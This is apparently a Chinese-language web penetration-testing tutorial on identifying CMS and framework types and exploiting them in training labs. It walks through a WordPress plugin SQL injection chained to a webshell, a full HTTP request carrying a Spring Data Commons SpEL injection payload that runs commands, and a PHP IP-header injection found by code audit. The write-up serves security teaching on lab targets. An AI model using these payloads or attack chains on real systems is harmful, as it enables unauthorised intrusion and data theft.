漏洞发现(二)Web应用之漏洞探针类型利用修复

前言

现在的服务器基本都是跑Web程序提供网页服务，所以web应用的漏洞挖掘也是重中之重，那么挖掘也是利用相应的思路进行挖掘。

Web站点程序判断

再拿到一个web站点，先判断该程序属于以下那种情况：

已知 CMS

如常见的 dedecms.discuz,wordpress 等源码结构，这种一般采用非框架类开发，但也有少部分采用的是框架类开发，针对此类源码程序的安全检测，我们要利用公开的漏洞进行测试，如不存在可采用 白盒代码审计自行挖掘。

开发框架

如常见的 thinkphp，spring,flask 等开发的源码程序，这种源码程序正常的安全测试思路：先获取对 应的开发框架信息(名字，版本)，通过公开的框架类安全问题进行测试，如不存在可采用白盒代码审 计自行挖掘。

未知 CMS

如常见的企业或个人内部程序源码，也可以是某 CMS 二次开发的源码结构，针对此类的源码程序测 试思路：能识别二次开发就按已知 CMS 思路进行，不能确定二次开发的话可以采用常规综合类扫描 工具或脚本进行探针，也可以采用人工探针（功能点，参数，盲猜），同样在有源码的情况下也可以 进行代码审计自行挖掘。

针对不同的类型web站点有不同的测试方式。

判断方式

在线网站：这种站点有很多 直接输入网址 在线进行识别CMS 识别网站url:CMS识别 – online tools

比如本站：

CMS识别小工具：

cmseek:扫描本站示例：

下载地址：GitHub – Tuhinshubhra/CMSeeK: CMS Detection and Exploitation suite – Scan WordPress, Joomla, Drupal and over 180 other CMSs

其他工具：

https://github.com/F6JO/CmsVulScan

https://github.com/wpscanteam/wpscan

案例演示

1、已知CMS非框架类–WordPress

地址：WordPress插件漏洞分析溯源_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 (mozhe.cn)

我们通过页面特殊信息判断为该CMS为wordpress：

或者利用工具扫描

得知是wordpress后我们利用专门扫描wordpress漏洞的工具wpscan进行扫描，这里需要去wpscan官网去申请一个apitoken才能用，进行扫描：

发现一个sql注入：打开漏洞链接http://www.exploit-db.com/exploits/24552/

找到注入点：

拼接一下得出注入路径：http://124.70.71.251:45854/wp-content/plugins/comment-rating/ck-processkarma.php?id=1&action=add&path=a

开sqlmap：

跑密码：

登录后台：

写入木马：

蚁剑连接拿key：

2**、已知框架类非CMS类–Javaweb框架Spring**

Spring Data是一个用于简化数据库访问，并支持云服务的开源框架，Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中，存在一处SpEL表达式注入漏洞，攻击者可以注入恶意SpEL表达式以执行任意命令。

靶场环境：Vulhub – Docker-Compose file for vulnerability environment

访问页面时，是一个spring常见的错误页面

通过扫目录的方式发现敏感页面/users

在输入一些数据后点击注册，并使用burp抓包，修改数据包为如下payload并发送：

POST /users?page=&size=5 HTTP/1.1
Host: x.x.x.x:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
Origin: http://x.x.x.x:8080
Connection: close
Referer: http://x.x.x.x:8080/users
Cookie: settingStore=1630480512401_0
Upgrade-Insecure-Requests: 1

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("命令")]=&password=&repeatedPassword=

即可进行RCE。

3.未知CMS非框架类的代码审计—qqyewu_php

首页刷新 打开数据库监控查看状态：

发现此条查询语句 可能存在前端控制变量：

进行查找该语句： 找到该函数

继续查找ip如何传入：

发现获取ip的函数

查看获取ip函数getIP的源码：

此时就很熟悉了 就是php获取ip那几个字段 这几个字段我们都是可以控制的，直接构造注入就好：

Web探针

Xray： xray是一款功能强大的安全评估、漏洞扫描工具

下载地址:https://github.com/chaitin/xray

AWVS :AWVS14.1.2下载安装教程（2021.3.6版本）_an1r的博客-CSDN博客_wvsc替换文件